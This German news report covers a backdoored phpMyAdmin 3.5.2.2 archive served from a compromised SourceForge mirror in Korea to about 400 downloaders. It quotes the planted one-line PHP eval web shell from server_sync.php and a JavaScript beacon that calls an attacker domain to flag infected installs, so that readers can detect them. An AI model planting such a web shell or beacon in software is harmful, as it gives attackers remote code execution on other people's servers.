Backdoor in phpMyAdmin via kompromittiertem SourcForge_Server verteilt

Das SourceForge-Team warnt vor einer phpMyAdmin-Version, die eine Backdoor enthält und via sourceforge.net ausgeliefert wurde. beziehungsweise war der Spielge-Server cdnetworks-kr-1 in Korea davon betroffen. Der Spiegel wurde sofort von der Rotation ausgeschlossen.

Der Provider des Spiegels hat den Angriff bestätigt und nach Analysen ist wohl nur dieser eine Spiegel-Server davon betroffen. Man geht davon aus, dass der Angriff um den 22. September stattgefunden hat.

Eine modifizierte Kopie der Datei phpMyAdmin-3.5.2.2-all-languages.zip wurde nur über den oben genannten Spiegel-Server ausgeliefert. Des Weiteren denken die Administratoren, dass nur phpMyAdmin geändert wurde. Vorsichtshalber überprüft man den Server genauer und der Spiegel bleibt vorerst von der Rotation ausgeschlossen.

Durch die Logfiles konnte die Administratoren rausfinden, dass zirka 400 Anwender die schädliche Datei heruntergeladen haben. Die Anwender, die man identifizieren konnte, wurden bereits per E-Mail benachrichtigt.

Die geänderte phpMyAdmin-Version enthält eine Backdoor. Diese erlaubt das Ausführen beliebigen PHP-Codes. Die schädliche Version lässt sich einfach überprüfen, denn sie enthält eine Datei mit Namen server_sync.php. Diese enthält folgenden Code-Schnippsel: <?php @eval($_POST['c']);?>. Der Einsatz von eval ist alles andere als ungefährlich und das PHP-Team rät von einer Benutzung ab.

Eine andere Datei, js/cross_framing_protection.js, wurde laut einer Sicherheits-Anweisung des phpMyAdmin-Teams ebenfalls modifiziert. Durch den Code

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

können Angreifer verwundbare Installationen identifizieren. Einen Blog-Eintragvon Michal Čihař gibt es dazu ebenfalls.